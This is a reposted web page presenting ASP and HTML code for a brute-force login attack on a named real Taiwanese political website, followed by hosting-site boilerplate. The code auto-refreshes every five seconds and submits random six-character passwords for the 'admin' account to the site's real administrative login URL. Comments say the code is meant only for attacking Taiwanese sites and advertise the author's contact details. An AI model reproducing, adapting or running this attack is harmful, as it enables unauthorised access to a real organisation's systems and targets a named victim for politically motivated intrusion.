Launch an ASP code to attack the Taiwan national Flag Design Network

Source: Internet
Author: User
Password login test after running test.htm ~!
-------------------------test.htm code is as follows:
<HTML>
<HEAD>
<TITLE></TITLE>
<meta http-equiv= "Refresh" content= "5" >
</HEAD>
<BODY>
<iframe src= "test.asp" width=859 height=406 name= "Top" frameborder=0 "1"
marginheight= "1" border= "0" scrolling= "no" ></iframe>
</body>
--------------------------test.asp code is as follows:
<%
' This code is only for attack the Taiwan website use, please do not test in the domestic site
' No random code repeat restrictions
' Undertake network project development, Business Contact qq:61795
' Msn:bigbird998@hotmail.com
Function Roundstr (STRLNG)
TMPSTR = "0123456789ABCDEFGHIJKLMNOPQRSTOPWXYZ"
' Tmpstr = ' 0123456789 '
For jjj = 1 to STRLNG
Randomize
StrLen = Len (TMPSTR)
t = Round ((RND * (strLen-1)) +1)
s = S & Mid (tmpstr,t,1)
Next
Roundstr = S
End Function
A=ROUNDSTR (6)
%>
<HTML>
<HEAD>
<TITLE></TITLE>
<meta http-equiv= "Expires" content= "0" >
</HEAD>
<body topmargin= "0" leftmargin= "0" rightmargin= "0" bottommargin= "0" >
<form method= "POST" action= "http://www.tsu.org.tw/admin/login.php" Name= "Form1" >
<font size=2><b> name:</b></font>
<input name= "Username" value= "admin" maxlength=256 size=25><font size=2><b> <font-size=2>< b> Password:</b></font>
<input name= "Password" value= "<%=a%>" Type=text maxlength=256
<input type=submit value= "Login" ></FORM>
<p> The current test password is: <font style=font:100pt><b><%=a%></b></font></p>
</BODY>
</HTML>
<script language= "JavaScript" >
<!--
This.document.forms[0].submit ()
-->
</script>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.